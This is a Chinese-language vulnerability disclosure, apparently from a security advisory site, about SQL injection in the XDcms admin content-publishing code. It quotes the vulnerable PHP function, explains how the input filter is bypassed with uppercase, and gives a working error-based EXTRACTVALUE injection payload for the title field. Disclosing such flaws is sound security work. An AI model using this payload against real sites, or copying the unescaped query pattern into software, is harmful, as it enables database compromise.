XDcms Sql Injection 1-5

### 简要描述： SQL Injection ### 详细说明： 注入在XDCMS企业管理系统后台的内容发布处，\system\modules\xdcms\content.php文件： ``` public function add_save(){ $title=safe_html($_POST['title']);//第一处注入title字段，safe_html为过滤规则集，可被大写绕过进行注入 $commend=intval($_POST['commend']); $username=safe_html($_POST['username']);//第二处注入username，大写可绕过过滤 $thumb=$_POST['thumb']; $keywords=safe_html($_POST['keywords']);//第三处注入，同上 $description=safe_html($_POST['description']);//第四处注入，同上 $inputtime=datetime(); $updatetime=strtotime($_POST['updatetime']); $url=$_POST['url'];//第五处注入，没有safe_html过滤。 $catid=intval($_POST['catid']); $userid=intval($_SESSION['admin_id']); $fields=$_POST['fields']; $style=$_POST['title_color']." ".$_POST['title_weight']; if(empty($title)||empty($catid)||empty($userid)||empty($updatetime)){ showmsg(C('material_not_complete'),'-1'); } $model=modelname($catid); $model_content=get_content_table($model); if(empty($model)){ showmsg(C('error'),'-1'); } $table=$this->mysql->show_table(); //判断数据表是否存在 if(!in_array(DB_PRE.$model,$table)){ showmsg(C('table_not_exist'),'-1'); } //添加content，sql语句，会将上边5个注入字段带入查询 $sql="insert into ".DB_PRE.$model."(title,commend,username,thumb,keywords,description,inputtime,updatetime,url,catid,userid,hits,style) values('{$title}','{$commend}','{$username}','{$thumb}','{$keywords}','{$description}','{$inputtime}','{$updatetime}','{$url}','{$catid}','{$userid}',0,'{$style}')"; $this->mysql->query($sql); $last_id=$this->mysql->insert_id(); //更新排序值 $this->mysql->db_update($model,"`sort`='".$last_id."'","`id`=".$last_id); //添加附加表 $sql_fields='`id`'; $sql_value=$last_id; if(!empty($_POST['uploadtype'])){ //判断是否有多图上传 $upload_array=$this->upload_more('morefile'); $uploadtype=$_POST['uploadtype']; $fields[$uploadtype]=serialize(array_clear($upload_array)); } foreach($fields as $key=>$value){ $sql_fields.=",`".$key."`"; if(is_array($value)){ $value_arr=''; foreach($value as $k=>$v){ $value_arr.=$v.','; } $value=$value_arr; } $sql_value.=",'".addslashes($value)."'"; } $query=$this->mysql->query("insert into ".DB_PRE.$model_content."({$sql_fields}) values ({$sql_value})"); if(!$query){ $this->mysql->db_delete($model,"`id`=".$last_id); showmsg(C('insert_table_error'),'-1'); } //生成静态 $config=base::load_cache("cache_set_config","_config"); $config_html=$config['createhtml']; //取出系统配置缓存 $array=get_category($catid); $ishtml=$array['is_html']; //取出栏目是否设置生成html if(substr($url,0,7)!="http://"){ //判断url是否为外链,如不是则更新url并生成内容html if($model=='single'){ $url=$array['url']; //如果是单页模型,url直接调用栏目url }else{ $url=$this->ob_url->conurl($catid,$last_id,$ishtml,$inputtime); } $this->mysql->db_update($model,"`url`='".$url."'","`id`=".$last_id); //生成url并更新 if($config_html==1&&$ishtml==1){ if($model=='single'){ $url=$url."index.html"; } $this->html->creat_show($catid,$last_id,$url,$array['lang']); //生成内容html } } if($config_html==1&&$ishtml==1){ $parent=is_parent($catid); $parent_id=explode(",",ltrim($parent,",")); if(count(array_filter($parent_id))!=0){ //判断是否有父类 foreach($parent_id as $value){ $parent_cat=get_category($value); //取出父类栏目的url $this->html->creat_list($value,"",$parent_cat['url']."index.html",$parent_cat['lang']); //生成父栏目页 $this->html->creat_list($catid,"",$array['url']."index.html",$array['lang']); //生成当前栏目页 } }else{ $this->html->creat_list($catid,"",$array['url']."index.html",$array['lang']); //如没有父类,生成列表页,减轻负担,默认只生成当前栏目第一页 } } if($config_html==1){ //如果系统设置生成html则生成首页 $lang=get_lang($array['lang']); $this->html->creat_index($array['lang'],$lang['dir']); } showmsg(C('add_success'),'-1'); } ``` ### 漏洞证明： 以第一处title字段为例 首先发布一个内容： [<img src="https://images.seebug.org/upload/201402/180907217b139f07ea9afc9ce208671a38bb35ca.jpg" alt="x.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/180907217b139f07ea9afc9ce208671a38bb35ca.jpg) 上面的title字段插入exp ``` ' AND EXTRACTVALUE(7028,CONCAT(0x5c,0x7177786771,(SELECT (CASE WHEN (7028=7028) THEN 1 ELSE 0 END)),0x71706b6b71)) AND 'PAKz'='PAKz ``` 最后看看结果 [<img src="https://images.seebug.org/upload/201402/180936357f126dd7796a356750aae82cfd1aaf97.jpg" alt="x1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/180936357f126dd7796a356750aae82cfd1aaf97.jpg)